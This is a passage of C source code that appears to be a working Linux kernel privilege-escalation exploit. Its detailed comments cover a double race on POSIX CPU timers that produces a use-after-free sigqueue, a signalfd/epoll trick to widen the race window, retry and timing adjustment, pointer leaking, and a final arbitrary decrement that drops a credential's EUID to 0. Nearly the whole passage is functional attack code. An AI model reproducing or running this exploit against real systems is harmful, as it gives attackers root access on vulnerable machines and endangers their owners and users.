pin_on_cpu(0);
// Reset `realloc_timer` on each try.
realloc_timer = (void *) -1;
// Receive child process's RACER thread's TID for reaping later
SYSCHK(read(exploit_child_to_parent[0], &racer_tid, sizeof(pid_t))); // sync 1
// Attach to the RACER thread and continue it
SYSCHK(ptrace(PTRACE_ATTACH, racer_tid, NULL, NULL));
SYSCHK(waitpid(racer_tid, NULL, __WALL));
SYSCHK(ptrace(PTRACE_CONT, racer_tid, NULL, NULL));
// Signal to child that we attached and continued
SYSCHK(write(exploit_parent_to_child[1], &m, 1)); // sync 2
// Reap the RACER thread.
//
// At this point, this should block while the RACER thread is consuming CPU
// time. There are three possible outcomes:
//
// 1. If the RACER thread exits and enters `handle_posix_cpu_timers()` AFTER
// `do_exit() -> exit_notify()` has woken us up. `waitpid()` will reap the
// RACER thread at that point and allow the timer to be freed.
//
// 2. If the RACER thread fires timers too early, then we'll just wake up
// after the race window is completely gone.
//
// 3. If the RACER thread never fires the timers, we'll also return after the
// race window is completely gone.
SYSCHK(waitpid(racer_tid, NULL, __WALL));
// Assume we won the race for now. Only the child process can tell us for sure.
// Child process will be waiting for us to let it know after `waitpid()` returns.
SYSCHK(write(exploit_parent_to_child[1], &m, 1)); // sync 3
// Child process `free_func()` thread lets us know when it freed the UAF timer so
// we can re-allocate it.
//
// Ensure to switch to CPU 3 before re-allocating.
pin_on_cpu(3);
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 4
// Either `free_func()` sends us SUCCESS, or the child process main thread sends us FAIL.
// In the success case, we are potentially in the race window with a freed timer.
if (m == SUCCESS_CHAR) {
// At this point, we know that the timers fired, because the SUCCESS_STR is only
// sent by the `free_func()` thread.
//
// But we don't know if we won the 1st race or not.
//
// In any case, we re-allocate the UAF timer now, because it prevents hitting the
// `BUG_ON` in `send_sigqueue()` if the timer was actually freed.
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &realloc_evt, &realloc_timer));
// If we assume we won the race, now `realloc_timer->sigq` is the same as `uaf_timer->sigq`,
// and `uaf_timer` is currently being handled by `handle_posix_cpu_timers()` via RACER thread.
//
// We want to wait a certain amount of time to let the RACER thread enter `send_sigqueue()`
// with the `uaf_timer->sigq`, and go past the `!list_empty()` check.
usleep(parent_settime_delay);
// Once past the `!list_empty()` check in `send_sigqueue()`,
// the `signalfd_notify()` is going to extend the 2nd race window for us.
//
// In that 2nd race window, use `timer_settime()` to fire the realloc timer immediately
// by setting the time in the past, and using `TIMER_ABSTIME`.
//
// If we time it just right, the RACER thread's `send_sigqueue()` will be past the
// `!list_empty()` check, and we'll also get past the check before either thread is
// able to insert the `sigqueue` into the target task's pending list.
//
// At this point, if all of it lined up, this same `sigqueue` will be inserted into both
// parent and child's pending lists at the same time.
SYSCHK(timer_settime(realloc_timer, TIMER_ABSTIME, &fire_ts, NULL));
// The child process will tell us whether it received SIGUSR2 or not. This
// is how we know whether we won the first race or not.
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 5
// If the child tells us that it didn't receive SIGUSR2, then there are two
// situations:
//
// 1. We lost the 1st race, so the child received NUM_TIMERS+1 SIGUSR1 signals. This
// means the child never could have seen the SIGUSR2 signal.
// 2. We won the 1st race, but the didn't win the 2nd race. This means the child could
// have seen the SIGUSR2 signal, but since it says it didn't, it means our timer
// fired too early.
//
// In the 2nd case, the signal's `overrun` field will be set to 1.
if (m == FAIL_CHAR) {
// NOTE: no need to poll here, because we'll have the signal here for sure.
// After all, we fired it didn't we? :p
struct signalfd_siginfo si;
SYSCHK(read(sigusr2_sfd, &si, sizeof(si)));
// Check for the 2nd case above, did the child receive the SIGUSR2 signal
// after it was already queued into our pending list?
if (si.ssi_overrun > 0) {
// We queued the SIGUSR2 too early into our pending list, so
// increase the `timer_settime()` delay for next time.
printf("\t[+] Parent raced too early, readjusting...\n");
parent_settime_delay += PARENT_SETTIME_DELAY_US_DELTA;
} else {
// 1st case above, reallocation just failed completely. We
// don't need to do anything.
}
} else {
// The child was able to observe the SIGUSR2 signal, which means we won the
// first race and successfully reallocated the `sigqueue` of the UAF timer.
//
// Now, since the child saw the SIGUSR2 signal, we have to check to see if
// we see the signal too (i.e double insertion check).
struct pollfd pfd = {
.fd = sigusr2_sfd,
.events = POLLIN
};
int ret = poll(&pfd, 1, 1);
if (ret < 0) {
// Some unknown error, pause to debug it.
perror("Exploit success path poll");
getchar();
} else if (pfd.revents & POLLIN) {
// We got the SIGUSR2 signal too, which means we won both races.
// First, let the child know that we succeeded.
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // sync 6.SUCCESS
// SUCCESS_COMMENT:
// UAF sigqueue is now in both process's pending list, but we don't
// know which list the UAF sigqueue's list is pointing to.
//
// This matters because when we dequeue this signal from the
// pending list, two things will happen:
//
// 1. The sigqueue will be removed from the list that it *thinks*
// it's in.
// 2. The other list will still point to the `sigqueue`, but the
// `sigqueue` itself is considered "empty" and thus cannot ever
// be removed from that other list.
//
// We need to know which list the sigqueue *thinks* it's in, so we can
// continuously dequeue it later as much as we want through the other
// list (after all, that's the only primitive we have, since only the
// task pending list has a reference to this UAF sigqueue).
//
// To figure this out, first delete the timer, so that dequeueing the
// UAF sigqueue later will free it.
SYSCHK(timer_delete(realloc_timer));
// Now, dequeue the UAF sigqueue. It doesn't matter that we dequeue
// it from the parent process, because the UAF sigqueue's own list
// pointers determines which list it's going to be removed from.
struct signalfd_siginfo si;
SYSCHK(read(sigusr2_sfd, &si, sizeof(si)));
// At this point, two cases:
//
// 1. If the UAF sigqueue's list pointers pointed to the parent's list,
// then polling here should timeout and not return any pending
// signals (as we just removed it).
// 2. If it pointed to the child's list, polling here will still
// return the signal, because the parent still points to it.
int ret = poll(&pfd, 1, 1);
if (ret > 0 && (pfd.revents & POLLIN)) {
// We have the infinitely looping sigqueue in our pending list.
// Let the child know via the fail string because we won.
SYSCHK(write(exploit_parent_to_child[1], FAIL_STR, 1)); // sync 7.FAIL
// Mark this parent as being the owner of the UAF sigqueue.
parent_owns_uaf_sigqueue = 1;
buggy_pid = (pid_t)syscall(SYS_gettid);
printf("\t[+] Freed UAF sigqueue in parent process pid %d\n", buggy_pid);
// Initiate stage 2
second_stage_exploit();
SYSCHK(write(exploit_parent_to_child[1], FAIL_STR, 1)); // sync 8.FAIL
} else if (!ret) {
// Timeout, means the `sigqueue` is in the child's list.
// Let the child know via the success string.
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // sync 7.SUCCESS
// Child will let us know when to continue.
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 1
second_stage_exploit();
} else {
// unknown error, just pause to debug it
perror("Exploit success path poll 2 unknown error");
getchar();
}
} else if (!ret) {
// Timeout case, we didn't receive the SIGUSR2 signal, but the
// child told us that it did. This means we won the first race
// and successfully reallocated over the UAF timer's sigqueue,
// but our `timer_settime()` fired too late.
//
// Adjust `start_sleep_time` accordingly to run `timer_settime()`
// earlier next time.
printf("\t[+] Parent raced too late, readjusting...\n");
parent_settime_delay -= PARENT_SETTIME_DELAY_US_DELTA;
// Let the child know that we failed.
SYSCHK(write(exploit_parent_to_child[1], FAIL_STR, 1)); // sync 6.FAIL
}
}
}
// Let the child process delete and free the timer, and
// all threads before retrying.
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 9
// Free `realloc_timer` if it was ever allocated.
if (realloc_timer != (void *) -1) {
timer_delete(realloc_timer);
}
}
// UNREACHABLE CODE:
// Wait for child to exit before exiting
waitpid(pid, NULL, __WALL);
close(exploit_child_to_parent[0]);
close(exploit_parent_to_child[1]);
exit(0);
} else {
// exploit child process
pin_on_cpu(1);
close(exploit_child_to_parent[0]);
close(exploit_parent_to_child[1]);
exploit_child_pid = (pid_t)syscall(SYS_gettid);
// Create signalfds, one each for SIGUSR1, SIGUSR2, SIGRTMIN+1, and SIGRTMIN+2.
sigset_t block_mask;
sigemptyset(&block_mask);
sigaddset(&block_mask, SIGUSR1);
sigusr1_sfds[0] = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));
sigemptyset(&block_mask);
sigaddset(&block_mask, SIGUSR2);
sigusr2_sfds[0] = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));
sigemptyset(&block_mask);
sigaddset(&block_mask, SIGRTMIN+1);
int sigrt1_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));
sigemptyset(&block_mask);
sigaddset(&block_mask, SIGRTMIN+2);
int sigrt2_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));
// Block all the above signals as well for later
sigemptyset(&block_mask);
sigaddset(&block_mask, SIGUSR1);
sigaddset(&block_mask, SIGUSR2);
sigaddset(&block_mask, SIGRTMIN+1);
sigaddset(&block_mask, SIGRTMIN+2);
sigprocmask(SIG_BLOCK, &block_mask, NULL);
// Duplicate the SIGUSR1 and SIGUSR2 sfds, and set up epoll
// watchers on them. In total, 50,000 waitqueue entries will
// be created.
//
// Credit: Jann Horn:
// https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html
int epoll_fds[EPOLL_COUNT];
for (int i = 0; i < EPOLL_COUNT; i++) {
epoll_fds[i] = SYSCHK(epoll_create1(EPOLL_CLOEXEC));
}
// Duplicate sfds, index 0 is the original
for (int i = 1; i < SFD_DUP_COUNT; i++) {
sigusr1_sfds[i] = SYSCHK(dup(sigusr1_sfds[0]));
sigusr2_sfds[i] = SYSCHK(dup(sigusr2_sfds[0]));
}
// Setup epoll watchers now
struct epoll_event ev = {0};
ev.events = EPOLLIN;
for (int i = 0; i < EPOLL_COUNT; i++) {
for (int j = 0; j < SFD_DUP_COUNT; j++) {
ev.data.fd = sigusr1_sfds[j];
SYSCHK(epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, sigusr1_sfds[j], &ev));
ev.data.fd = sigusr2_sfds[j];
SYSCHK(epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, sigusr2_sfds[j], &ev));
}
}
// 50,000 waitqueue entries now setup on the signalfds for
// `signalfd_notify()` in the kernel later.
prctl(PR_SET_NAME, "EXPLOIT_CHILD");
pthread_barrier_init(&barrier, NULL, 2);
// Thread that will handle freeing the UAF timer.
pthread_t free_timer_thread;
// On a different CPU to the cross-cache CPUs, enqueue a `SIGRTMIN+2` signal.
// This is used later to leak the task pending list address.
pid_t my_pid = (pid_t)syscall(SYS_gettid);
SYSCHK(syscall(__NR_tkill, my_pid, SIGRTMIN+2));
printf("[+] Stage 1 - Attempting to win the race...\n");
while (1) {
// printf("Try %d\n", race_retry_count+1);
// Reset `uaf_timer` before every attempt.
uaf_timer = (void *) -1;
// Drain signalfds as they could have left over signals from
// the previous try.
struct signalfd_siginfo si;
drain_signalfd(sigusr1_sfds[0]);
drain_signalfd(sigusr2_sfds[0]);
// Create the FREE_TIMER and RACER threads
SYSCHK(pthread_create(&race_thread, NULL, (void*)race_func, NULL));
SYSCHK(pthread_create(&free_timer_thread, NULL, (void*)free_func, NULL));
// Parent process writes to us when attached and continued, use
// a barrier to continue the RACER thread now
SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 2
pthread_barrier_wait(&barrier); // barrier 1
// Wait for timers to be created by RACER thread
pthread_barrier_wait(&barrier); // barrier 2
// Arm the timers now, ensuring the first 18 are before the
// UAF timer
struct itimerspec ts = {
.it_interval = {0, 0},
.it_value = {
.tv_sec = 0,
.tv_nsec = ONE_MS_NS - 1,
},
};
for (int i = 0; i < NUM_TIMERS; i++) {
SYSCHK(timer_settime(stall_timers[i], 0, &ts, NULL));
}
// Arm UAF timer as the latest one
ts.it_value.tv_nsec = ONE_MS_NS;
SYSCHK(timer_settime(uaf_timer, 0, &ts, NULL));
// Now, let RACER thread continue
pthread_barrier_wait(&barrier); // barrier 3
// Parent exploit process tells us after `waitpid()` returns.
SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 3
// Wait up to 100ms for the any signals to be received
//
// NOTE: Depending on how long the race window is, this timeout
// may need to be longer.
//
// In my case, the race window is 24-30ms long, so 100ms is
// plenty.
struct pollfd pfds[2] = {
{ .fd = sigusr1_sfds[0], .events = POLLIN },
{ .fd = sigusr2_sfds[0], .events = POLLIN },
};
int sigusr1_count = 0;
int race_won = 0;
// This is unused normally, but can be used with a kernel
// patch. See below.
int poll_timeout = 100;
// Poll for SIGUSR1 and SIGUSR2.
for (;;) {
int ret = poll(pfds, 2, poll_timeout);
if (!ret) {
// Timeout case means one of two things:
//
// 1. No timers were fired at all.
// 2. Timers were fired, but the 2nd race was lost, so
// we didn't see the reallocated timer's SIGUSR2 signal.
//
// In the first case, `sigusr1_count` will be 0, use that
// to know that we should cancel the `free_timer_thread`,
// as otherwise it will be running and waiting forever for
// a signal.
if (!sigusr1_count) {
pthread_cancel(free_timer_thread);
}
// In the 2nd case, we'll hit this timeout only if the parent
// process queued the SIGUSR2 signal on itself before we could
// enter the 2nd race window (so we failed the `!list_empty()` check).
//
// This basically means we didn't receive the SIGUSR2 signal, but
// also received one less SIGUSR1 signal than we'd expect (because the
// UAF timer that was supposed to send us the last SIGUSR1 was reallocated).
//
// In this case, the `free_func()` thread will have already exited. We
// just let the parent know.
//
// Note: for the first case above, we also let the parent know. That's why
// this write is marked with sync 4.FAIL and sync 5.FAIL, since it
// handles two separate failure scenarios.
SYSCHK(write(exploit_child_to_parent[1], FAIL_STR, 1)); // sync 4.FAIL, 5.FAIL
break;
}
else if (ret > 0 && (pfds[0].revents & POLLIN)) {
// We got SIGUSR1! Timers fired.
//
// Wait for the `free_func()` thread to handle the SIGUSR1
// signal first before doing anything the first time.
if (!sigusr1_count) pthread_barrier_wait(&barrier); // barrier 4
// KERNEL PATCH: change timeout to 1s after SIGUSR1 seen, guarantees
// that we win the second race.
// poll_timeout = 1000;
// Got the SIGUSR1 signal, drain it and increase count
sigusr1_count += drain_signalfd(sigusr1_sfds[0]);
if (sigusr1_count >= NUM_TIMERS+1) {
// Receiving 19 SIGUSR1 signals means the first race failed,
// because the parent process failed to reallocate and change
// the UAF timer's signal to SIGUSR2.
//
// The parent process will be waiting for us to let it know
// whether the reallocated timer was able to send us the
// SIGUSR2 or not. In this case, we failed.
//
// Let the parent know and exit this poll loop.
SYSCHK(write(exploit_child_to_parent[1], FAIL_STR, 1)); // sync 5.FAIL
break;
}
} else if (ret > 0 && (pfds[1].revents & POLLIN)) {
// We got SIGUSR2! Race is potentially won, so let's check.
// Let parent process know to check for SIGUSR2 signal
SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // sync 5.SUCCESS
SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 6
if (m == SUCCESS_CHAR) {
// For an explanation of the below steps, ctrl+f for
// "SUCCESS_COMMENT:" in this exploit. It explains
// how to figure out which list the `sigqueue's` next
// and prev pointers point to (i.e child or parent process's
// pending list).
SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // sync 7
// Parent tells us whether we have the UAF sigqueue in our pending list or not.
if (m == SUCCESS_CHAR) {
// We have the signal in our list.
//
// This is an extremely rare situation, as the race window for this
// to occur is so incredibly small.
//
// If you see "Freed sigqueue in child process" and the exploit fails,
// please restart :) because I have never ran into this situation, so
// the exploit is untested from here on out.
parent_owns_uaf_sigqueue = 0;
buggy_pid = (pid_t)syscall(SYS_gettid);
printf("\t[+] Freed UAF sigqueue in child process pid %d\n", buggy_pid);
printf("\t[+] NOTE: The exploit is untested in this state. If you reach here and the exploit fails, please retry :)\n");
// Tell the parent to continue the exploit now.
SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 1
// Parent will tell us to dequeue the SIGRTMIN+2 signal.
SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 2
// Dequeueing this signal will put the pointer of our task struct's pending list
// into the ->prev pointer of the UAF sigqueue.
SYSCHK(read(sigrt2_sfd, &si, sizeof(si)));
// Let the parent know it can continue
SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 3
// Wait for the parent to ask us to dequeue the SIGUSR2 signal now.
SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 4
// Now dequeue the UAF sigqueue's signal to write it's own pointers back into itself.
// This will happen because of the `list_del_init()` in `collect_signal()`.
//
// The parent does this on CPU 2, so we do the same here, and switch back
// afterwards.
//
// NOTE: After this, SIGUSR2 is removed from the task's signal mask, but
// SIGRTMIN+1 stays.
pin_on_cpu(2);
SYSCHK(read(sigusr2_sfds[0], &si, sizeof(si)));
pin_on_cpu(1);
// Let the parent know it can continue
SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 5
// Parent will let us know when to dequeue the other sigqueue
SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 6
// Dequeue the SIGRTMIN+1 signal. This MUST be done on CPU 2 for the
// second cross-cache to work.
pin_on_cpu(2);
SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
pin_on_cpu(1);
// Let the parent know it can continue
SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 7
// Parent will let us know when to use the arbitrary decrement primitive.
SYSCHK(read(exploit_parent_to_child[0], &m, 1)); // stage 2 - sync 8
// Arbitrary decrement time! Decrement target cred's EUID to 0. This process
// will have the same UID as the target cred, so we can use that to know
// how many times to decrement.
for (int i = 0; i < getuid(); i++) {
SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
}
// Exploit is now finished, let the parent know and block forever.
SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // stage 2 - sync 9
// This will block forever, parent won't write to us anymore.
SYSCHK(read(exploit_parent_to_child[0], &m, 1));
} else {
// We don't have the signal in our list, parent can
// continue the exploit now.
//
// This will block forever, parent won't write to us anymore.
SYSCHK(read(exploit_parent_to_child[0], &m, 1));
}
} else {
break; // Failed
}
} else {
// error, just pause to debug it
printf("poll error in main\n");
getchar();
}
}
// If we got here, our current attempt failed. Update `syscall_loop_times`.
syscall_loop_times++;
syscall_loop_times %= SYSCALL_LOOP_TIMES_MAX+1;
race_retry_count++;
// Free stall timers
for (int i = 0; i < NUM_TIMERS; i++) {
timer_delete(stall_timers[i]);
}
// Free UAF timer in case it didn't get deleted.
if (uaf_timer != (void *) -1) {
timer_delete(uaf_timer);
}
// Either the `free_timer_thread` got a signal and exited
// normally, or it didn't get a signal and we cancelled
// it in the poll code above. Either way, we can join it.
SYSCHK(pthread_join(free_timer_thread, NULL));
// Signal to parent to try again
SYSCHK(write(exploit_child_to_parent[1], "t", 1)); // sync 9
}
// UNREACHABLE CODE:
// Signal to parent to exit
SYSCHK(write(exploit_child_to_parent[1], "t", 1));
// Wait for parent to exit
close(exploit_child_to_parent[1]);
close(exploit_parent_to_child[0]);
for (int i = 0; i < SFD_DUP_COUNT; i++) {
close(sigusr2_sfds[i]);
close(sigusr1_sfds[i]);
}
exit(0);
}
}